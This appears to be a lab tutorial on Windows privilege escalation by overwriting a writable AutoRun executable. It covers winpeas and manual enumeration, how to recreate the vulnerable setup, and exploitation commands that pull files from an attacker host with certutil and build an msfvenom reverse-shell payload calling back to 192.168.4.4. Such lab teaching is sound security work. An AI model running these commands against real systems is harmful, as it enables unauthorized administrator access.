Autorun applications in Windows are programs or processes that are set to run automatically when the operating system starts up. These programs can be configured to run automatically in several ways, such as by adding them to the Startup folder, or by using the Windows registry.
AutoRuns can also be vulnerable to abuse by attackers who can add malicious programs to the list of auto-start programs. This can happen if an attacker gains access to a Windows system and is able to add their own code to the list of startup programs. When a user logs in to the system, the malicious program will automatically run with the same privileges as the user. This means that the attacker cannot escalate privileges unless an Admin logs into the machine.
What you’ll learn
- How to enumerate for AutoRuns using winpeas
- How to enumerate for AutoRuns manually
- How to Exploiting AutoRuns
- How to replicate the vulnerability
Enumerating for the Vulnerability
Scenario: We have a user level shell as “user1” and want to escalate privileges.
For the first example, lets find the AutoRuns vulnerability with winpeas.exe
To bring the winpeas executable from Kali to Windows, lets first host a python web server on Kali
python3 -m http.server 80
Then, lets use certutil.exe to download the file
certutil.exe -urlcache -f http://192.168.4.4/winpeas.exe winpeas.exe
Once its downloaded we can run it with the “applicationsinfo” option. Looking through the out put, we can see this.
We see that the executable “app123.exe” in the “C:\applications\” directory is set to autorun. Winpeas also shows us that we have permissions to write to this directory.
For the second enumeration example, lets try to find this vulnerability manually.
Lets first search for all of the AutoRun applications. The first two autoruns are not very interesting but we can further enumerate the third one.
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Lets use icacls to check if we have write privileges on app123.exe.
icacls C:\applications\app123.exe
- (F): This represents the permissions granted to the user or group. In this case, it stands for “Full Control”, which means the user has permission to read, write, modify, and execute the file.
Exploiting AutoRuns
Exploiting this vulnerability is pretty simple. All we have to do is replace the autoruns executable with our own executable.
First, lets create a malicious exe file using msfvenom. Make sure to give this file the same name that the autoruns application had.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.4.4 LPORT=53 --platform Windows -f exe > app123.exe
Now we host a python webserver on Kali just like we did for winpeas, and use certutil.exe to transfer the reverse shell executable to Windows.
certutil.exe -urlcache -f http://192.168.4.4/reverse.exe reverse.exe
Before we move the reverse shell executable to the C:\applications\ directory we should make a copy of the original executable.
move C:\applications\app123.exe C:\Users\user1\Desktop\app123.exe.bak
Now we can move the reverse shell executable to the C:\applications\ directory
move app123.exe C:\applications\app123.exe
Lets start a netcat listener on our Kali
To actually get the reverse shell to run, we need to shutdown/restart the machine and get an ADMIN to log in.
First, lets shutdown the machine using “shutdown /r”
To simulate this properly, I will play the role of an Admin and log into the Windows machine.
NOTE: In a REAL scenario an Admin might try to log into the machine a couple days or weeks later so this attack needs a little bit of luck.
Back on our netcat, we get a shell as the Administrator
Replicate the AutoRuns Vulnerability
First, open registry editor with Admin privileges and navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce you’re there, right click on the white space and click New > “String Value”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Enter a name for it. Then right click it and select modify.
In the “Value data:” section, set the path to the executable you want to set to autostart.
Once all of that is done, you want to make sure its actually vulnerable. So now we need to give write permissions to a user so they’re able to create files where the service123.exe file is located
To do this, open up file explore and click on “Properties”
Go to the Security tab and click on Edit
Then click on “Add”
After that, enter the name of the user
Thanks for reading! If you found this post useful, be sure to share it.
